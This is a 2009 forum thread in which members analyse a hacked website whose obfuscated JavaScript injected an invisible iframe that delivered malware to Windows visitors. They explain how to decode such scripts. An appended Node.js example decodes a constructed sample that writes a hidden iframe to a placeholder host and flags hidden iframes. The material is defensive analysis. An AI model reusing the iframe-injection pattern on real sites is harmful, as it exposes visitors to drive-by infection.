Topic: Bad stuff on a site

Offline jcarter

  • TS Addict
  • *****
  • Posts: 5808
    • View Profile
    • http://www.jcarter.net/ourdogs/muffinpage.html
Bad stuff on a site
« on: February 04, 2009, 02:10:50 PM »
I remember reading about this here recently, here is more, 2 screenshots,
Jane

Offline Paddy

  • Administrator
  • TS Addict
  • *****
  • Posts: 13797
    • View Profile
    • https://www.paddyduncan.com
Bad stuff on a site
« Reply #1 on: February 04, 2009, 02:23:48 PM »
Jane, I didn't get that warning when I went there just now in Safari. However, in FF, I did get the attack site warning. What is the IP number associated with the site? It should be on the malware warning at the bottom - but you've covered it with the attack site warning I think. Since I'm not getting the malware warning, I can't see it.

When I click on the link to the Google diagnostics in the attack site warning I get this:

QUOTE
What happened when Google visited sites hosted on this network?

    Of the 15276 site(s) we tested on this network over the past 90 days, 2065 site(s), including, for example, couponsdeal.com/, tjw-uk.com/, worldofmen.org/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2009-02-04, and the last time suspicious content was found was on 2009-02-04.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 46 site(s) on this network, including, for example, free-social-tools.com/, sudokus2go.com/, woodyspornnetwork.com/, that appeared to function as intermediaries for the infection of 140 other site(s) including, for example, hausverwaltersuche.de/, caw2.com/, downloadyoutubevids.com/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 127 site(s), including, for example, xdxbx.com/, worldvedro.com/, free-social-tools.com/, that infected 1666 other site(s), including, for example, bedoon.net/, almosafr.com/, samaq8.com/.


Updated 4 hours ago


The service provider, servage.net in Germany, appears to be having some ongoing issues - apparently not solved as this site claims:

http://allensmithnet.vox.com/library/post/...ensmithnet.html
« Last Edit: February 04, 2009, 02:37:11 PM by Paddy »
"If computers get too powerful, we can organize them into committees. That'll do them in." ~Author unknown •iMac 5K, 27" 3.6Ghz i9 (2019) • 16" M1 MBP(2021) • 9.7" iPad Pro • iPhone 13

Offline jcarter

« Reply #2 on: February 04, 2009, 02:32:43 PM »
It's 77.232.68.144

Offline Paddy

« Reply #3 on: February 04, 2009, 02:38:52 PM »
Furthermore, the issues have been going on for a long time:

http://www.webhostingtalk.com/showthread.p...8462&page=4
http://www.befuddled.me.uk/2008/11/site-hacked-daily/

Wonder if they're on any lists of bad hosts that Tacit may have?

From the IP number, which belongs to Servage, I'd say the sites themselves have the malware. In Chris' case, only a redirect TO the malware-hosting site was injected into the HTML.

Servage.net is obviously a host to avoid!
« Last Edit: February 04, 2009, 02:44:37 PM by Paddy »

Offline jcarter

« Reply #4 on: February 04, 2009, 02:41:58 PM »
I have added in FF the ability to see the IP number on the bottom right of the status bar on any page I go to,
but interestingly, mine is password protected, here is the message when I type my IP # in, or the other site of mine just comes up blank.
« Last Edit: February 04, 2009, 02:43:15 PM by jcarter »

Offline tacit

  • TS Addict
  • *****
  • Posts: 1628
    • View Profile
    • http://www.xeromag.com/
Bad stuff on a site
« Reply #5 on: February 05, 2009, 03:17:11 PM »
Just took a look at the site.

If you visit hammersound.net (on a Mac, you can't be infected by it), and then do a View Source in your browser, the very first thing you'll see is a JavaScript. This JavaScript has been written in a confusing manner to make it as hard as possible to read, but it loads an invisible frame from http://7speed.info; that invisible frame attempts to download a virus on vulnerable Windows computers.

7speed.info is hosted in Russia (of course); hammersound.net is hosted on Servage (www.servage.net). Hammersound has been infected in the past as well; it's an extremely poorly secured site.

I've fired off an email to Servage; let's see if they do anything about cleaning up their network.
« Last Edit: February 06, 2009, 07:05:51 AM by kbeartx »
A whole lot about me: www.xeromag.com/franklin.html

Offline jcarter

« Reply #6 on: February 05, 2009, 04:06:20 PM »
Hi Tacit,
Thank you for explaining it. I went to hammersound to see some Garage Band music.
It's fun for me to learn about this stuff.
Jane

Offline Paddy

« Reply #7 on: February 05, 2009, 06:25:54 PM »
Tacit, is it the script at the top of the page or the one at the bottom (and how did you dig that bit of info out...I looked at it and couldn't make head or tail of it)

Also - there are a bunch of invisible links on that page - mostly to porn sites, so my guess is those were dumped in there by the hacker too. I had to wonder what was the point of having invisible links - until I read a bit more about this issue. (see below) The JavaScript is what makes them invisible, since it has "display = none" in there, and they're not popups. Google takes a very dim view of invisible links; generally one's page rank will drop badly if you have them, so the virus problem isn't the only hack going on here.

You can see at least some of the links (though not all the porn ones, which must be more recent than Google's cache) if you check the page here:

http://www.seoidiot.co.uk/cachechecker/

Something to do with this, probably:

http://www.lifehacker.com.au/tips/2008/06/...te_hackers.html

http://blogs.computerworld.com/bad_combo_h...with_seo_skills

http://www.deepjiveinterests.com/2008/04/0...f-blogs-hacked/

The nasty thing is that without the virus in there as well, the problems on that site could very well have gone undetected for ages if the page is not updated. I think I'll email the site owner. I'm assuming he doesn't have a clue about this.
« Last Edit: February 05, 2009, 06:47:09 PM by Paddy »

Offline jcarter

« Reply #8 on: February 05, 2009, 07:36:39 PM »
Egads!  What did I find when just surfing for Garage Band songs.
This is scary. The site owner must be terribly upset, what should someone do in a situation like this, switch to a small web host?
And blogs, how to keep them from this.

Can you put this stuff in to keep search engines and bad stuff away?
<meta name="robots" content="noindex,nofollow,noarchive">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache, must-revalidate">
I would not want my lessons nor my family picture sites to ever be picked up by a search engine.
Nor compromised by something like this horrid stuff.
Yes, sort of glad I found this, it's an interesting topic to say the least.
Glad there are warnings not to click upon a site which has been hacked.
Jane

A question, what the heck does the criminal gain by doing such a thing?

Offline Paddy

« Reply #9 on: February 05, 2009, 08:29:02 PM »
QUOTE
A question, what the heck does the criminal gain by doing such a thing?


In this case, money. (See some of the links I listed - they more or less explain things.) The virus probably does something like allow your computer to be taken over remotely by the hackers to send out masses of spam; some of which of course does stuff like drive people to fake PayPal or bank sites.

As for keeping search engines off your site, you should also create a robots.txt file. Instructions here:

http://www.e-myth.com/cs/user/print/post/w...-block-the-bots (and look at the NYT example he links to - you could copy it and just add all the major search engines)
« Last Edit: February 05, 2009, 08:29:33 PM by Paddy »

Offline krissel

  • Administrator
  • TS Addict
  • *****
  • Posts: 14735
    • View Profile
Bad stuff on a site
« Reply #10 on: February 06, 2009, 01:17:41 AM »
Interesting article about web registrars who are vulnerable to spammers and not doing much to avoid it.

http://tech.yahoo.com/news/pcworld/2009020...snamedandshamed

http://www.knujon.com/registrars/


They want you to send them your spam. There's an AppleScript down the page for Mac users.

http://www.knujon.com/sendusspam.html


A Techsurvivors founder

Offline Xairbusdriver

  • Administrator
  • TS Addict
  • *****
  • Posts: 26388
  • 27" iMac (mid-17), Big Sur, Mac mini, Catalina
    • View Profile
    • Mid-South Weather
Bad stuff on a site
« Reply #11 on: February 06, 2009, 04:26:33 PM »
I'm not sure I want any contact with a company on that top/worst-ten list. Why should I send them anything that has my address on it? Or even bother to delete that bit and send the rest hoping that they don't try to get it another way? I'm just not trained to 'associate' with dangerous animals...
THERE ARE TWO TYPES OF COUNTRIES
Those that use metric = #1 Measurement system
And the United States = The Banana system
CAUTION! Childhood vaccinations cause adults! :yes:

Offline tacit

« Reply #12 on: February 06, 2009, 06:22:03 PM »
QUOTE(Paddy @ Feb 6 2009, 12:25 AM)
Tacit, is it the script at the top of the page or the one at the bottom (and how did you dig that bit of info out...I looked at it and couldn't make head or tail of it)


The one at the top.

The script is written in a highly obfuscated way, but it's easy to decode if you know a little bit about how JavaScript works.

These obfuscated scripts work by taking an encoded string, decoding it, and then putting it into the Web page by using a document.write command or an eval command. You can sort them out by saving the HTML to disk, opening them in a text editor, and looking for anything that says document.write or eval. You change the document.write or eval command to alert (the command to pop up a box), then open the HTML file in your browser. A window will pop up containing the decoded JavaScript.

In this case, the decoded JavaScript opens an invisible iFrame from http://7speed.info, a site hosted in Russia. The invisible frame contains instructions to trick Internet Explorer into downloading a virus.

QUOTE(Paddy @ Feb 6 2009, 12:25 AM)
Also - there are a bunch of invisible links on that page - mostly to porn sites, so my guess is those were dumped in there by the hacker too. I had to wonder what was the point of having invisible links - until I read a bit more about this issue. (see below) The JavaScript is what makes them invisible, since it has "display = none" in there, and they're not popups. Google takes a very dim view of invisible links; generally one's page rank will drop badly if you have them, so the virus problem isn't the only hack going on here.


Yes. Technically, the "display = none" isn't JavaScript, it's CSS.

All kinds of sites use this CSS. For example, if you go to a Web site that causes a picture to appear in the middle of the screen when you click a link (iWeb can do this), the picture is actually always there. It's loaded when the page loads but it is set to display = none. When you click a button or a link the display = none is changed and bink! There it is, like magic.

The purpose of putting the hidden porn links in there is money. Google's page rank works by the number of people who link *to you*. The more other web sites that link to you, the higher your page appears in the searches. So hackers make their own pages appear higher in Google's searches by hacking other people's sites and then placing links on the hacked sites to their own sites.

QUOTE(Paddy @ Feb 6 2009, 12:25 AM)
The nasty thing is that without the virus in there as well, the problems on that site could very well have gone undetected for ages if the page is not updated. I think I'll email the site owner. I'm assuming he doesn't have a clue about this.


That would probably be a good idea, but I think the site owner may be MIA.
A whole lot about me: www.xeromag.com/franklin.html
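
The decoding trick described in Reply #12, as an added example that is not part of anyone's post in this thread: instead of editing the saved HTML by hand, the script is run in Node with eval and document.write replaced by recorders, and whatever it tried to write is checked for hidden iframes. SAMPLE is a constructed, harmless script and payload.example is a placeholder host; the function names are assumptions of this example.

```javascript
// Added example (not from the thread). SAMPLE is constructed and harmless;
// payload.example is a placeholder host.
const vm = require('node:vm');

const SAMPLE =
  "var s='%3Ciframe%20src%3D%22http%3A//payload.example/x%22%20width%3D0" +
  "%20height%3D0%20style%3D%22display%3Anone%22%3E%3C/iframe%3E';" +
  "eval('document.write(unescape(s))');";

// Run the script with eval and document.write replaced by recorders, the
// same idea as swapping them for alert(). node:vm is not a security
// boundary: analyse real samples only inside a disposable VM.
function decodeLayers(source, maxLayers = 5) {
  const layers = [];   // strings the script tried to eval
  const written = [];  // markup the script tried to add to the page
  const pending = [source];
  const context = vm.createContext({
    eval: (code) => { layers.push(String(code)); pending.push(String(code)); },
    document: { write: (...parts) => { written.push(parts.join('')); } },
  });
  // Each recorded eval string is run in turn, so nested layers unwrap too.
  for (let i = 0; i < maxLayers && pending.length > 0; i++) {
    try {
      vm.runInContext(pending.shift(), context, { timeout: 1000 });
    } catch (err) {
      layers.push('[stopped: ' + err.message + ']');
    }
  }
  return { layers, written };
}

// Flag iframes a visitor would never see: zero size or hidden by CSS.
function hiddenIframes(html) {
  const found = [];
  for (const [tag] of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const hidden = /\b(?:width|height)\s*=\s*["']?0\b/i.test(tag) ||
      /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(tag);
    if (hidden) found.push(src ? src[1] : '(no src)');
  }
  return found;
}

const result = decodeLayers(SAMPLE);
console.log(result.layers);
console.log(hiddenIframes(result.written.join('')));
```

Because the recorder defers eval'd code to the next pass instead of running it in place, scripts that depend on local variables at the eval call site may stop early; the recorded layers still show what was being decoded.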